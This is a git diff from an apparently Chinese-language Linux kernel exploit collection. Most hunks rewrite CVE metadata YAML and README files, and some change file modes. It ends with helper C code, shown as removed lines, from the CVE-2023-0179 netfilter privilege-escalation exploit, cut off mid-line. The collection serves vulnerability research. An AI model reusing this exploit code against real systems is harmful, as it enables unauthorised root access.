7.8 - cve-id: CVE-2021-42008 - cwe-id: CWE-787 - cnvd-id: - kve-id: +id: CVE-2021-42008 +source: https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-42008 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access + scope-of-influence: + Linux 2.1.94~v5.13.12 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42008 + - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13 + - https://www.youtube.com/watch?v=d5f9xLK8Vhw + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2021-42008 + cwe-id: CWE-787 + cnvd-id: + kve-id: tags: 协议解码溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml index 883f66527f0aa8500f86675b9572d4f56929610f..5beb14e68a3571e352cc1f8e1740f3585d46f8b4 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml @@ -1,23 +1,23 @@ -id: CVE-2021-42327 -source: https://github.com/docfate111/CVE-2021-42327 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: medium - description: | - Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。 - - scope-of-influence: - Linux kernel before 5.14.14 - - reference: - - https://nvd.nist.gov/vuln/detail/cve-2021-42327 - - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 6.7 - cve-id: CVE-2021-42327 - cwe-id: CWE-787 - cnvd-id: None - kve-id: None - +id: CVE-2021-42327 +source: https://github.com/docfate111/CVE-2021-42327 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: | + Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。 + + scope-of-influence: + Linux kernel before 5.14.14 + + reference: + - https://nvd.nist.gov/vuln/detail/cve-2021-42327 + + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 6.7 + cve-id: CVE-2021-42327 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml index 38cb0b6978b4d230aae5c6424612b57b7d344b5c..83f564c5774d62807127dd4471590aaf809927a0 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml @@ -1,22 +1,22 @@ -id: CVE-2021-43267 -source: https://github.com/zzhacked/CVE-2021-43267 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 - severity: critical - description: - 该漏洞是由于Linux内核中的net/tipc/crypto.c存在溢出漏洞, TIPC在2020年9月引入的新用户消息类型“MSG_CRYPTO”, 其标头大小和消息大小都根据实际数据包大小进行验证, 但对于消息的keylen成员MSG_CRYPTO或密钥算法名称本身(TIPC_AEAD_ALG_NAME)的大小没有类似大小的检查, 这就导致恶意攻击者可以在此处构造一个较小的恶意数据包, 然后利用keylen成员属性的任意大小特性写入该位置的边界之外, 从而造成远程代码执行. 由于本地对于内核堆大小的控制更加容易, 因此该漏洞很容易在本地进行利用, 而因为TIPC本身的特性, 恶意攻击者也可以利用该漏洞实施远程攻击, 由于该漏洞利用方式简单, 危害较大. - scope-of-influence: - 5.10-rc1 < Linux Kernel < 5.15 - reference: - - https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/ - - https://thehackernews.com/2021/11/critical-rce-vulnerability-reported-in.html - - https://www.zdnet.com/article/remote-code-execution-flaw-patched-in-linux-kernel-tipc-module/#ftag=RSSbaffb68 - - https://nvd.nist.gov/vuln/detail/CVE-2021-43267 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-43267 - cwe-id: CWE-20 - cnvd-id: None - kve-id: None +id: CVE-2021-43267 +source: https://github.com/zzhacked/CVE-2021-43267 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 + severity: critical + description: + 该漏洞是由于Linux内核中的net/tipc/crypto.c存在溢出漏洞, TIPC在2020年9月引入的新用户消息类型“MSG_CRYPTO”, 其标头大小和消息大小都根据实际数据包大小进行验证, 但对于消息的keylen成员MSG_CRYPTO或密钥算法名称本身(TIPC_AEAD_ALG_NAME)的大小没有类似大小的检查, 这就导致恶意攻击者可以在此处构造一个较小的恶意数据包, 然后利用keylen成员属性的任意大小特性写入该位置的边界之外, 从而造成远程代码执行. 由于本地对于内核堆大小的控制更加容易, 因此该漏洞很容易在本地进行利用, 而因为TIPC本身的特性, 恶意攻击者也可以利用该漏洞实施远程攻击, 由于该漏洞利用方式简单, 危害较大. + scope-of-influence: + 5.10-rc1 < Linux Kernel < 5.15 + reference: + - https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/ + - https://thehackernews.com/2021/11/critical-rce-vulnerability-reported-in.html + - https://www.zdnet.com/article/remote-code-execution-flaw-patched-in-linux-kernel-tipc-module/#ftag=RSSbaffb68 + - https://nvd.nist.gov/vuln/detail/CVE-2021-43267 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-43267 + cwe-id: CWE-20 + cnvd-id: None + kve-id: None tags: 堆溢出漏洞 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-0185/Makefile b/cve/linux-kernel/2022/CVE-2022-0185/Makefile index 615313cf36ad22261759ccbb65c5e278ad8dc38a..470206368db598a9f6b3f4a6920d9c5dd1ec0929 100644 --- a/cve/linux-kernel/2022/CVE-2022-0185/Makefile +++ b/cve/linux-kernel/2022/CVE-2022-0185/Makefile @@ -1,2 +1,2 @@ -all: exploit.c +all: exploit.c gcc exploit.c -o exploit -static -no-pie -s \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-0185/README.md b/cve/linux-kernel/2022/CVE-2022-0185/README.md index 90bfd2aa5e07b28d943307c7684074c0ac5dec76..33aeb800d4114c7f35ca7c60f2fa6a9438e80c72 100644 --- a/cve/linux-kernel/2022/CVE-2022-0185/README.md +++ b/cve/linux-kernel/2022/CVE-2022-0185/README.md @@ -1,10 +1,10 @@ -# CVE-2022-0185 pipe version - -Using pipe-primitive to exploit CVE-2022-0185, so no kaslr leak nor smap smep ktpi bypass is needed :) - -(Q: What is pipe-primitive? A: https://github.com/veritas501/pipe-primitive) - -![](assets/it_works.png) - -### 漏洞检测程序来源 -- https://github.com/veritas501/CVE-2022-0185-PipeVersion +# CVE-2022-0185 pipe version + +Using pipe-primitive to exploit CVE-2022-0185, so no kaslr leak nor smap smep ktpi bypass is needed :) + +(Q: What is pipe-primitive? A: https://github.com/veritas501/pipe-primitive) + +![](assets/it_works.png) + +### 漏洞检测程序来源 +- https://github.com/veritas501/CVE-2022-0185-PipeVersion diff --git a/cve/linux-kernel/2022/CVE-2022-0847/compile.sh b/cve/linux-kernel/2022/CVE-2022-0847/compile.sh old mode 100755 new mode 100644 diff --git a/cve/linux-kernel/2022/CVE-2022-25636/README.md b/cve/linux-kernel/2022/CVE-2022-25636/README.md index 72351dad298b02ad1280ad3fcad795fff4cee980..d6ed3ca03682b64836d4c5a9cc17a97383ab449d 100644 --- a/cve/linux-kernel/2022/CVE-2022-25636/README.md +++ b/cve/linux-kernel/2022/CVE-2022-25636/README.md @@ -1,29 +1,29 @@ - - -__漏洞概述:__ - -攻击者可利用该漏洞访问越界内存,从而导致系统崩溃或进行提权。Linux内核中netfilter子组件引起的越界内存访问漏洞,Netfilter是Linux 2.4.x引入的一个子系统,提供了一整套hook函数的管理机制,实现了数据包过滤、NAT等功能。 - -__环境:__ - -Linux内核为5.13.0-30。 - -__注意事项:__ - -exploit并不是每次都生效(~40%),失败后需重新启动后再exploit。 - -可利用可能破坏堆上的重要数据,或进行提权。 - -__原理说明:__ - -漏洞的发生点位于: - -​ linux\net\netfilter\nf_dup_netdev.c : 67 : nft_fwd_dup_netdev_offload - -​ 在设置flow->rule->action.entries时没有对堆边界进行检查。 - -__参考资料:__ - -代码来自于 https://github.com/Bonfee/CVE-2022-25636 - + + +__漏洞概述:__ + +攻击者可利用该漏洞访问越界内存,从而导致系统崩溃或进行提权。Linux内核中netfilter子组件引起的越界内存访问漏洞,Netfilter是Linux 2.4.x引入的一个子系统,提供了一整套hook函数的管理机制,实现了数据包过滤、NAT等功能。 + +__环境:__ + +Linux内核为5.13.0-30。 + +__注意事项:__ + +exploit并不是每次都生效(~40%),失败后需重新启动后再exploit。 + +可利用可能破坏堆上的重要数据,或进行提权。 + +__原理说明:__ + +漏洞的发生点位于: + +​ linux\net\netfilter\nf_dup_netdev.c : 67 : nft_fwd_dup_netdev_offload + +​ 在设置flow->rule->action.entries时没有对堆边界进行检查。 + +__参考资料:__ + +代码来自于 https://github.com/Bonfee/CVE-2022-25636 + 参考链接:https://www.openwall.com/lists/oss-security/2022/02/21/2 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential b/cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential old mode 100755 new mode 100644 diff --git a/cve/linux-kernel/2022/CVE-2022-27666/README.md b/cve/linux-kernel/2022/CVE-2022-27666/README.md index 397df2c5977035462ebb261c20d11fac38f7f3ff..655cf99cf8c00ffd774ae5042a343a7f4466e65a 100644 --- a/cve/linux-kernel/2022/CVE-2022-27666/README.md +++ b/cve/linux-kernel/2022/CVE-2022-27666/README.md @@ -1,17 +1,17 @@ -**漏洞描述:** - -这是针对CVE-2022-27666的漏洞,该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 - -**影响版本:** - -linux kernel 5.17-rc5 - -**漏洞危害** - -漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出,此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象,并可能导致本地权限升级威胁。 - -**参考资料** - -代码来自:https://github.com/plummm/CVE-2022-27666 - +**漏洞描述:** + +这是针对CVE-2022-27666的漏洞,该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 + +**影响版本:** + +linux kernel 5.17-rc5 + +**漏洞危害** + +漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出,此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象,并可能导致本地权限升级威胁。 + +**参考资料** + +代码来自:https://github.com/plummm/CVE-2022-27666 + 参考链接:https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/compile.sh b/cve/linux-kernel/2022/CVE-2022-27666/compile.sh old mode 100755 new mode 100644 diff --git a/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh b/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh old mode 100755 new mode 100644 diff --git a/cve/linux-kernel/2022/CVE-2022-27666/run.sh b/cve/linux-kernel/2022/CVE-2022-27666/run.sh old mode 100755 new mode 100644 diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml index eb773fd638c81bc9ea9f9193d64d4af14cafef48..2c0bf1f06eecb9b233fc7ec46de31b6d929c4683 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml @@ -1,18 +1,18 @@ -id: CVE-2022-36946 -source: https://github.com/Pwnzer0tt1/CVE-2022-36946 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 - description: | - Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 - scope-of-influence: - 5.18.14 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 - - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2022-36946 +id: CVE-2022-36946 +source: https://github.com/Pwnzer0tt1/CVE-2022-36946 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: 高危 + description: | + Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + scope-of-influence: + 5.18.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-36946 tags: 拒绝服务,cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml index 64fbf4c341e37ad6fbc62d806cfa8ad33e18f17f..cdf3a35d162a9c218a86837d0d5f526383930c75 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml @@ -1,23 +1,23 @@ -id: CVE-2022-0435 -source: - https://github.com/wlswotmd/CVE-2022-0435 -info: - name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用. - severity: high - description: - 在Linux内核的TIPC协议功能中发现了一个堆栈溢出缺陷, 即用户发送带有恶意内容的数据包时, 域成员节点的数量高于允许的64个. 这个缺陷允许远程用户崩溃系统, 如果他们能够访问TIPC网络, 则可能提升其权限. - scope-of-influence: - linux_kernel 4, linux_kernel 5, Red Hat Enterprise Linux 8, redhat virtualization 4 - references: - - https://nvd.nist.gov/vuln/detail/CVE-2022-0435 - - https://bugzilla.redhat.com/show_bug.cgi?id=2048738 - - https://security.netapp.com/advisory/ntap-20220602-0001/ - - https://www.openwall.com/lists/oss-security/2022/02/10/1 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cvi-id: CVE-2022-0435 - cwe-id: CWE-787 - cnvd-id: None - kve-id: None +id: CVE-2022-0435 +source: + https://github.com/wlswotmd/CVE-2022-0435 +info: + name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用. + severity: high + description: + 在Linux内核的TIPC协议功能中发现了一个堆栈溢出缺陷, 即用户发送带有恶意内容的数据包时, 域成员节点的数量高于允许的64个. 这个缺陷允许远程用户崩溃系统, 如果他们能够访问TIPC网络, 则可能提升其权限. + scope-of-influence: + linux_kernel 4, linux_kernel 5, Red Hat Enterprise Linux 8, redhat virtualization 4 + references: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0435 + - https://bugzilla.redhat.com/show_bug.cgi?id=2048738 + - https://security.netapp.com/advisory/ntap-20220602-0001/ + - https://www.openwall.com/lists/oss-security/2022/02/10/1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cvi-id: CVE-2022-0435 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None tags: 提升权限, 堆栈溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml index d857929551429400189d9e6f2c1c23a2f28d54c0..aa7b89c2d2b87e90a41e874de7bf592c507dfbb2 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml @@ -1,29 +1,29 @@ -id: CVE-2022-2586 -source: https://github.com/aels/CVE-2022-2586-LPE -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: medium - description: | - Linux nf_tables cross-table存在安全漏洞,该漏洞源于释放后重用,允许本地特权攻击者在删除表时导致释放后重用,可能导致本地特权升级。 - scope-of-influence: - Red Hat Enterprise Linux 9 - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586 - - https://www.openwall.com/lists/oss-security/2022/08/09/5 - - https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t - - https://www.zerodayinitiative.com/advisories/ZDI-22-1118/ - - https://ubuntu.com/security/notices/USN-5557-1 - - https://ubuntu.com/security/notices/USN-5560-1 - - https://ubuntu.com/security/notices/USN-5560-2 - - https://ubuntu.com/security/notices/USN-5562-1 - - https://ubuntu.com/security/notices/USN-5564-1 - - https://ubuntu.com/security/notices/USN-5565-1 - - https://ubuntu.com/security/notices/USN-5566-1 - - https://ubuntu.com/security/notices/USN-5567-1 - - https://ubuntu.com/security/notices/USN-5582-1 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 6.7 - cve-id: CVE-2022-2586 - cnvd-id: NONE +id: CVE-2022-2586 +source: https://github.com/aels/CVE-2022-2586-LPE +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: | + Linux nf_tables cross-table存在安全漏洞,该漏洞源于释放后重用,允许本地特权攻击者在删除表时导致释放后重用,可能导致本地特权升级。 + scope-of-influence: + Red Hat Enterprise Linux 9 + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586 + - https://www.openwall.com/lists/oss-security/2022/08/09/5 + - https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t + - https://www.zerodayinitiative.com/advisories/ZDI-22-1118/ + - https://ubuntu.com/security/notices/USN-5557-1 + - https://ubuntu.com/security/notices/USN-5560-1 + - https://ubuntu.com/security/notices/USN-5560-2 + - https://ubuntu.com/security/notices/USN-5562-1 + - https://ubuntu.com/security/notices/USN-5564-1 + - https://ubuntu.com/security/notices/USN-5565-1 + - https://ubuntu.com/security/notices/USN-5566-1 + - https://ubuntu.com/security/notices/USN-5567-1 + - https://ubuntu.com/security/notices/USN-5582-1 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 6.7 + cve-id: CVE-2022-2586 + cnvd-id: NONE tags: netfilter, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml index 611fb2f14924f12afb97261c2172e9bad80466d9..62fd85c07765282abc9c257c515a26b515bf4c41 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml @@ -1,18 +1,18 @@ -id: CVE-2022-32250 -source: https://github.com/theori-io/CVE-2022-32250-exploit -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - Linux内核5.18.1中的net/netfilter/nf_tables_api.c允许本地用户(能够创建用户/net命名空间)将权限升级到root,因为错误的NFT_STATEFUL_EXPR检查会导致释放后使用。 - scope-of-influence: - Linux kernel 5.15.0-27 - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250 - - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-32250 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2022-32250 - cnvd-id: CNNVD-202206-407 - tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022 +id: CVE-2022-32250 +source: https://github.com/theori-io/CVE-2022-32250-exploit +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + Linux内核5.18.1中的net/netfilter/nf_tables_api.c允许本地用户(能够创建用户/net命名空间)将权限升级到root,因为错误的NFT_STATEFUL_EXPR检查会导致释放后使用。 + scope-of-influence: + Linux kernel 5.15.0-27 + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250 + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-32250 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-32250 + cnvd-id: CNNVD-202206-407 + tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022 diff --git a/cve/linux-kernel/2023/CVE-2023-0179/Makefile b/cve/linux-kernel/2023/CVE-2023-0179/Makefile index 2a0391f005bb59a224976f3fcacd5038fecc01df..9431825d877873c2ec8e966781c0bc8efe8b1295 100644 --- a/cve/linux-kernel/2023/CVE-2023-0179/Makefile +++ b/cve/linux-kernel/2023/CVE-2023-0179/Makefile @@ -1,12 +1,12 @@ -objects= ./helpers.o ./exploit.o ./needle.o - -.PHONY: clean needle - -needle: $(objects) - $(CC) $(objects) -lmnl -lnftnl -o needle - -./%.o: %.c - $(CC) -c $(CFLAGS) -o "$@" "$<" - -clean: - rm -rf ./helpers.o ./needle.o ./needle ./exploit.o +objects= ./helpers.o ./exploit.o ./needle.o + +.PHONY: clean needle + +needle: $(objects) + $(CC) $(objects) -lmnl -lnftnl -o needle + +./%.o: %.c + $(CC) -c $(CFLAGS) -o "$@" "$<" + +clean: + rm -rf ./helpers.o ./needle.o ./needle ./exploit.o diff --git a/cve/linux-kernel/2023/CVE-2023-0179/helpers.c b/cve/linux-kernel/2023/CVE-2023-0179/helpers.c index ca5ebf229d9d9cf528dd94282b99d48cbd303695..706ac92794eba3fc796f08ecd53b331f3e20f927 100644 --- a/cve/linux-kernel/2023/CVE-2023-0179/helpers.c +++ b/cve/linux-kernel/2023/CVE-2023-0179/helpers.c @@ -1,395 +1,395 @@ -/* - * ---------------------------------------------------------------------------- - * "THE BEER-WARE LICENSE" (Revision 42): - * David Bouman (pql) wrote this file. As long as you retain this notice you - * can do whatever you want with this stuff. If we meet some day, and you think - * this stuff is worth it, you can buy me a beer in return. Signed, David. - * ---------------------------------------------------------------------------- - */ - -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include "helpers.h" - -unsigned long read_from_file(int line) { - int fd; - char buf[20]; - unsigned long result; - char *endptr; - - fd = open("reg.log", O_RDONLY); - if (fd == -1) { - perror("open"); - exit(1); - } - - if (read(fd, buf, sizeof(buf)) == -1) { - perror("read"); - close(fd); - exit(1); - } - - if (line == 1 && read(fd, buf, sizeof(buf)) == -1) { - perror("read"); - close(fd); - exit(1); - } - - result = strtoul(buf, &endptr, 16); - if (result == ULONG_MAX && endptr == buf) { - fprintf(stderr, "strtoul: invalid argument\n"); - close(fd); - exit(1); - } - close(fd); - return result; -} - -static uint64_t default_batch_req_handler(struct mnl_socket* nl, int portid, int table_seq) -{ - char buf[MNL_SOCKET_BUFFER_SIZE]; - - int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); - - while (ret > 0) { - ret = mnl_cb_run(buf, ret, table_seq, portid, NULL, NULL); - if (ret <= 0) break; - ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); - } - return ret; -} - -int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - char buf[MNL_SOCKET_BUFFER_SIZE]; - struct mnl_nlmsg_batch* batch = mnl_nlmsg_batch_start(buf, sizeof buf); - uint8_t msg_type = msg & 0xff; - uint8_t nft_type = (msg >> 8) & 0xff; - nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++); - mnl_nlmsg_batch_next(batch); - int table_seq = *seq; - struct nlmsghdr* nlh; - - if (result_handler == NULL) { - result_handler = default_batch_req_handler; - } - - if (msg == NFT_MSG_NEWSET) { - nlh = nftnl_set_nlmsg_build_hdr( - mnl_nlmsg_batch_current(batch), - NFT_MSG_NEWSET, family, - msg_flags | NLM_F_ACK, (*seq)++); - } else { - nlh = nftnl_nlmsg_build_hdr( - mnl_nlmsg_batch_current(batch), - msg_type, family, - msg_flags | NLM_F_ACK, (*seq)++ - ); - } - if (msg == NFT_MSG_NEWSET) { - nftnl_set_nlmsg_build_payload(nlh, *object); - nftnl_set_free(*object); - } else { - switch(nft_type) { - case NFT_TYPE_TABLE: - nftnl_table_nlmsg_build_payload(nlh, *object); - nftnl_table_free(*object); - break; - case NFT_TYPE_CHAIN: - nftnl_chain_nlmsg_build_payload(nlh, *object); - nftnl_chain_free(*object); - break; - case NFT_TYPE_RULE: - nftnl_rule_nlmsg_build_payload(nlh, *object); - // offload mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2)); - nftnl_rule_free(*object); - break; - default: - return -1; - } - } - - *object = NULL; - - mnl_nlmsg_batch_next(batch); - nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++); - mnl_nlmsg_batch_next(batch); - - int ret = mnl_socket_sendto( - nl, - mnl_nlmsg_batch_head(batch), - mnl_nlmsg_batch_size(batch) - ); - - if (ret < 0) { - perror("mnl_socket_send"); - return -1; - } - - int portid = mnl_socket_get_portid(nl); - - mnl_nlmsg_batch_stop(batch); - - result_handler(nl, portid, table_seq); -} - -struct nftnl_table* build_table(char* name, uint16_t family) -{ - struct nftnl_table* t = nftnl_table_alloc(); - - nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); - nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); - - return t; -} - -struct nftnl_chain* build_chain(char* table_name, char* chain_name, char *dev_name, struct unft_base_chain_param* base_param) -{ - struct nftnl_chain* c; - - c = nftnl_chain_alloc(); - - nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name); - nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name); - if (dev_name) - nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); - - if (base_param) { - nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num); - nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio); - } - - return c; -} - -struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle) -{ - struct nftnl_rule* r = NULL; - uint8_t proto; - - r = nftnl_rule_alloc(); - - nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table_name); - nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain_name); - nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family); - - if (handle) { - nftnl_rule_set_u64(r, NFTNL_RULE_POSITION, *handle); - } - - return r; -} - -struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family) -{ - // Create a new set object - struct nftnl_set *set = nftnl_set_alloc(); - - nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); - nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); - nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_MAP); - nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); - nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, 4); - nftnl_set_set_u32(set, NFTNL_SET_DATA_LEN, 4); - nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); - nftnl_set_set_u32(set, NFTNL_SET_ID, 1); - - //nftnl_set_add_expr(set, expr); - return set; -} - -#define 